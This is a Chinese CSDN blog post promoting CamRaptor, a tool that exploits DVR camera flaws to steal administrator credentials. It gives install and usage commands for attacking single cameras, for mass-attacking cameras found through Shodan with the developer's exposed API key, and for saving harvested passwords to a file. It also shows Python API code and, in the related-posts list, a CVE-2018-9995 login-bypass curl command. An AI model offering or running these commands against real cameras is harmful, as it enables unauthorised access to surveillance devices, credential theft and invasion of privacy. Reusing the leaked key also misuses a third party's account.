CamRaptor:针对DVR摄像头的漏洞利用工具

最新推荐文章于 2023-09-16 13:49:24 发布
最新推荐文章于 2023-09-16 13:49:24 发布
阅读量898 收藏 6
点赞数 1
分类专栏: 安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43977912/article/details/120666707
版权

关于CamRaptor
CamRaptor是一款针对DVR摄像头的漏洞利用工具,它可以利用当前主流DVR摄像头中的多个安全漏洞,帮助广大研究人员获取目标DVR网络摄像头的管理员凭证。

功能介绍
能够利用当前主流DVR摄像头中的多个安全漏洞,例如Novo、CeNova和QSee等。
经过优化处理,支持以多线程的形式同时攻击列表中的多个目标DVR摄像头。
简单的命令行接口和API使用方法。

工具安装
由于CamRaptor使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装CamRaptor:
pip3 install git+https://github.com/EntySec/CamRaptor
工具基础使用
CamRaptor的使用非常简单,我们只需要在命令行终端中输入“camraptor”命令即可使用CamRaptor:

工具使用样例
攻击单个摄像头
下列命令可以攻击单个DVR摄像头:
camraptor -a 192.168.99.100
通过网络攻击远程DVR摄像头
接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!
从输入文件获取目标摄像头
我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:
camraptor -t -i cameras.txt -o passwords.txt
注意:此命令将会攻击cameras.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用
CamRaptor还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:
from camraptor import CamRaptor
基础函数
exploit(address):根据给定的地址针对单个目标执行漏洞利用攻击;

调用样例
攻击单个摄像头:
from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit(‘192.168.99.100’)
print(creds)

项目地址
CamRaptor:https://github.com/EntySec/CamRaptor

在这里插入图片描述

黄一113530
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络摄像头扫描
06-03
网络摄像头扫描
Fing-Pro(可以扫描宾馆中是否有网络摄像头
04-26
//最新中文版,免费无广告,可以扫描网络摄像头// Fingapp中文版下载是一款网络安全扫描工具可以让你更快的了解你的网络是否安全,是否有隐藏的偷窥隐私的行为,帮助更多人实现自己的安全保障,保障自己家中的网络安全,防止蹭网,防止网络被破解等。
java虚拟机绕过,DVR登录绕过漏洞(CVE-2018-9995)
weixin_31302909的博客
03-16 428
###漏洞描述此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。###漏洞利用1.利用代码curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"2.poc利用https://github.com/ezelf/CVE-2018-9995_...
针对常见网络摄像头漏洞扫描工具
最新发布
潇湘信安的博客
09-16 1193
主要针对网络摄像头漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备。Windows 仍有部分bug,Linux 与 Mac可以正常使用。请确保安装了3.7及以上版本的Python,推荐3.8
允许攻击者访问视频流:D-Link摄像头漏洞分析
systemino的博客
05-05 1337
概述 对于许多人来说,都希望通过安装“智能”摄像头,来提高家庭或办公室的安全性。一旦这些设备直接连接到互联网,只需点击几下,用户就可以轻松查看他们的监控视频流。然而,如果摄像头受到安全漏洞的影响,那么这种“便利性”将很快变成薄弱点,会给未经授权的攻击者打开大门。正如ESET智能家居研究团队的研究结果所显示的,D-Link DCS-2132L云端摄像头就正在面临这样的情况。该摄像头存在一系列安全漏...
h264_dvr_rce:TVT DVR上的远程代码执行漏洞
05-14
h264_dvr_rce 博客文章-http:
RayScan漏扫工具
JZJCyangfan的博客
12-16 974
通过登录扫描可对数据库的系统表甚至字段进行安全检测。对系统存在的弱口令做检测,支持知名的协议、数据库、中间件、HTTP服务、HTTPS服务和摄像头检测如TELNET、FTP、SSH、POP3、RDP、SMTP、Oracle、MySQL、PostgreSQL、MsSQL、Sybase、Informix、HTTP、大华摄像头、华为摄像头等。支持扫描物联网设备,如主流厂商海康威视、宇视、华为、大华、Brickcom、索尼、TP-LINK、AXIS、佳能等的摄像头,三星、惠普、爱普生、佳能等厂商的打印机。
网络摄像头漏洞扫描工具-Ingram
siu~
08-16 1212
主要针对网络摄像头漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备
DVR登录绕过漏洞复现(CVE-2018-9995)
LKmnbZ's Blog
01-12 1218
1. 基本概念 POC proof ofConcept 观点证明 证明漏洞是存在的 一般对目标没有伤害的 EXP exploit 漏洞利用 具备了对目标造成伤害的能力 一般以获取远端的控制权为主要标志 VUL vulnerability 泛指漏洞 CVE Common Vulnerabilities & Exposures 公共漏洞和暴露 0DAY Zero-daye...
iwatchdvrIII:iwatch dvr II 重构
07-18
iwatchdvrIII iwatch dvr II 重构
sdvr:Swann DVR * -3425 DVR的客户端
05-23
录像机Swann DVR * -3425 DVR的常规操作工具。 实现端口9000 / SwannView协议。 注意:此工具不会绕过Swann DVR实施的任何身份验证或保护。 您必须在DVR系统上输入有效的用户名和密码才能使用此工具。 该工具目前...
dvr.zip_dvr_dvrweb_dvrweb.asp_php 监控_摄像头 PHP
09-20
监控软件中DVR的web控制代码。通过PHP访问控制摄像头
PlexPostProc:用于DVR(测试版)的Plex后处理脚本
05-07
PlexPostProc 适用于Ubuntu 14.04(或更高版本)服务器或官方Docker上DVR(Beta)的Plex后处理脚本如果您像我一样,您可能只希望简洁的脚本将Plex DVR的录制内容转换为小得多的文件大小。 就个人而言,我想进一步...
「360水滴」事件后,你的摄像头就安全了吗? IP问问:发现风险网络摄像头的位置
热门推荐
AIwenIPgeolocation的博客
12-29 5万+
一度引起关注的「360水滴」事件,最终以关闭直播平台作为事件的结束。至此公众归于平静。但随着智能物联网家用设备的飞速发展,「360水滴」事件后,你的网络摄像头就安全吗?显然不是的。 根据调查发现,那些能够「直播」你生活的隐患无处不在! 图1:通过IP问问查询到全球暴露网络监控摄像头位置 ● 那些「直播」我们生活的「天眼」 网络中有很多「黑色产业链」正在窥探着你的隐私
海康威视SDK使用总结
hykkingking的博客
03-13 5万+
海康威视SDK使用总结 公司的项目里使用到海康威视的摄像监控设备,然后项目要求在我们的B/S系统中集成摄像头的播放画面。因此通过和海康威视工作人员的沟通,和网上一些人的文章,实现了在自己的网页里进行预览和回放。 一、海康威视的SDK 海康威视的视频监控设备有网络摄像头、网络硬盘录像机(NVR)等。这些设备都自带一个小系统,可以通过在浏览器上输入设备的IP进行监控画面的查看和设备信息的修改。 如图所...
摄像头漏洞检测
jorhelp的博客
06-06 1967
学校、商场、咖啡厅甚至一些家庭,这些设备维护不够完善的地方,总会存在网络安全隐患。对于网络摄像头设备,安全性显得尤为重要,因为它会泄露我们的隐私。然而总会有些人因为懒得打补丁,或者是使用弱口令导致摄像头被黑客造访,变成了现场直播。这个开源的项目:Ingram 可以帮助我们快速检测网段中的摄像头设备是否存在漏洞或者弱口令问题。以便于及时修复,避免造成损失。严厉声明:该项目仅供学习与安全检测,请大家心存正义,切勿用于非法用途。安装:...
iframe可以阻止弹窗吗_插件分享 | 可以查看摄像头快照的“Hikvision插件”
weixin_29549747的博客
12-03 196
前言:之前在Goby群里看到有人讨论过海康这个漏洞,自己平时也有遇到过。该漏洞能够查看摄像头的的快照,但是每次都需要手动去访问。耳东表姐一直催插件(没有),所以写一个简单的验证插件来熟悉熟悉goby的插件开发流程。希望通过此次分享,吸引更多人大佬能加入到开发插件的行列中来,搞点牛批的插件出来。0x001 插件效果当扫描出Hikvision IP Camera Access Bypass...
Ipa-medit:针对重签名IPA的内存搜索和修复工具
weixin_43977912的博客
10-09 5144
关于Ipa-medit Ipa-medit是一款针对重签名IPA的内存搜索和修复工具,该工具可以在不越狱的情况下使用,主要针对的是移动端游戏安全测试领域。 内存修改是游戏领域中最容易实现作弊的方法了,它也是安全测试中需要重点检查的项目之一。当然了,社区还有其他的一些作弊工具可以使用,比如说GameGem和iGameGuardian等等。但是,现在还没有支持未越狱设备并且带有CUI的工具,因此我们开发出了Ipa-medit,广大研究人员可以将其当作安全测试工具来使用。 工具要求 macOS:需要先安装好有效的
海康调用摄像头列表api
05-13
海康威视的摄像头列表API可以通过HTTP或SDK调用。这里提供两种不同的方式进行说明: ... // 摄像头信息在struIpDevInfo和struIpChanInfo中 } ``` 注意:以上代码仅供参考,具体实现需要根据SDK提供的接口进行编写。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值